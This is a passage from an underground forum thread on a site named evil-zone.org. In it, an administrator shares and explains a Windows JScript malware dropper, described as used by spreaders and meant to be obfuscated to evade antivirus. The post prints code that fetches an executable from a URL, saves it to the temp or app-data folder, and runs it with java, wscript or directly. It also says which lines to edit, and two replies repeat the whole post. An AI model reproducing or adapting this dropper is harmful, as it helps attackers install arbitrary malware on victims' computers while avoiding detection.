Welcome to Our Community!

Connect, share insights, and earn credits while following our guidelines. Advertising and Pakistan-related data are prohibited, and we do not host a trading platform. Upgrade your profile for unrestricted access and explore the "Help" section for rules and tips.

Malware Simple Malware JS Dropper Source Code | evil-zone.org | 2024

For Malware Discussion
Anony

Anony

Administrator
Staff member
Admin
Member
LV
0
 
Joined
Jun 2, 2024
Messages
4,292
Reaction score
934
Points
113
Awards
5
Location
Planet Mars
Website
evil-zone.org
EvilCoin
16,809
Crypto
0

🔥 This code is a simple dropper, used recently by spreader. It will be obfuscated to avoid antivirus protection. To make sure how the script works, let me explain.

1️⃣ Download Payload

The script uses an HTTP request to download an executable file (windows.exe) from a specified URL (fileUrl).

var fileUrl = "
You must be registered for see links
";
var httpRequest = WScript.CreateObject("Microsoft.XMLHTTP");
httpRequest.open("GET", fileUrl, false);
httpRequest.send();

2️⃣ Save the Payload

The script saves the downloaded file to a specific location on the user's file system, either in the temporary files directory or the application data directory.

var stream = WScript.CreateObject("Adodb.Stream");
stream.Type = 1; // binary
stream.open();
stream.write(httpRequest.responseBody);
stream.savetofile(fileName, 2); // save to file
stream.close();

3️⃣ Execute the Payload

After saving the file, the script executes it. It checks the file extension to determine the appropriate method for execution:

➡️.jar files are run using java -jar.
➡️.vbs and .wsf files are run using wscript.
➡️Other file types are executed directly.

if (fileName.endsWith(".jar")) {
shell.run("java -jar \"" + fileName + "\"");
} else if (fileName.endsWith(".vbs") || fileName.endsWith(".wsf")) {
shell.run("wscript \"" + fileName + "\"");
} else {
shell.run("\"" + fileName + "\"");
}

🦅 To edit the script, edit line...

➡️ 10 for the fileName.
➡️ 11 for the fileUrl.
➡️ 12 for the useTempPath (using it would be "true" and doesn't need admin)

Download:


To view the content, you need to Sign In or Register.
To view the content, you need to Sign In or Register.

 
Last edited by a moderator:
Anony said:

🔥 This code is a simple dropper, used recently by spreader. It will be obfuscated to avoid antivirus protection. To make sure how the script works, let me explain.

1️⃣ Download Payload

The script uses an HTTP request to download an executable file (windows.exe) from a specified URL (fileUrl).

var fileUrl = "
You must be registered for see links
";
var httpRequest = WScript.CreateObject("Microsoft.XMLHTTP");
httpRequest.open("GET", fileUrl, false);
httpRequest.send();

2️⃣ Save the Payload

The script saves the downloaded file to a specific location on the user's file system, either in the temporary files directory or the application data directory.

var stream = WScript.CreateObject("Adodb.Stream");
stream.Type = 1; // binary
stream.open();
stream.write(httpRequest.responseBody);
stream.savetofile(fileName, 2); // save to file
stream.close();

3️⃣ Execute the Payload

After saving the file, the script executes it. It checks the file extension to determine the appropriate method for execution:

➡️.jar files are run using java -jar.
➡️.vbs and .wsf files are run using wscript.
➡️Other file types are executed directly.

if (fileName.endsWith(".jar")) {
shell.run("java -jar \"" + fileName + "\"");
} else if (fileName.endsWith(".vbs") || fileName.endsWith(".wsf")) {
shell.run("wscript \"" + fileName + "\"");
} else {
shell.run("\"" + fileName + "\"");
}

🦅 To edit the script, edit line...

➡️ 10 for the fileName.
➡️ 11 for the fileUrl.
➡️ 12 for the useTempPath (using it would be "true" and doesn't need admin)

Download:


*** Hidden text: cannot be quoted. ***
*** Hidden text: cannot be quoted. ***

Click to expand...
wow
 
H
Anony said:

🔥 This code is a simple dropper, used recently by spreader. It will be obfuscated to avoid antivirus protection. To make sure how the script works, let me explain.

1️⃣ Download Payload

The script uses an HTTP request to download an executable file (windows.exe) from a specified URL (fileUrl).

var fileUrl = "
You must be registered for see links
";
var httpRequest = WScript.CreateObject("Microsoft.XMLHTTP");
httpRequest.open("GET", fileUrl, false);
httpRequest.send();

2️⃣ Save the Payload

The script saves the downloaded file to a specific location on the user's file system, either in the temporary files directory or the application data directory.

var stream = WScript.CreateObject("Adodb.Stream");
stream.Type = 1; // binary
stream.open();
stream.write(httpRequest.responseBody);
stream.savetofile(fileName, 2); // save to file
stream.close();

3️⃣ Execute the Payload

After saving the file, the script executes it. It checks the file extension to determine the appropriate method for execution:

➡️.jar files are run using java -jar.
➡️.vbs and .wsf files are run using wscript.
➡️Other file types are executed directly.

if (fileName.endsWith(".jar")) {
shell.run("java -jar \"" + fileName + "\"");
} else if (fileName.endsWith(".vbs") || fileName.endsWith(".wsf")) {
shell.run("wscript \"" + fileName + "\"");
} else {
shell.run("\"" + fileName + "\"");
}

🦅 To edit the script, edit line...

➡️ 10 for the fileName.
➡️ 11 for the fileUrl.
➡️ 12 for the useTempPath (using it would be "true" and doesn't need admin)

Download:


*** Hidden text: cannot be quoted. ***
*** Hidden text: cannot be quoted. ***

Click to expand...
I
 
You must log in or register to reply here.

14,323
Threads
47,419
Messages
3,185
Members
Ripperbey12
Latest member
Back
Top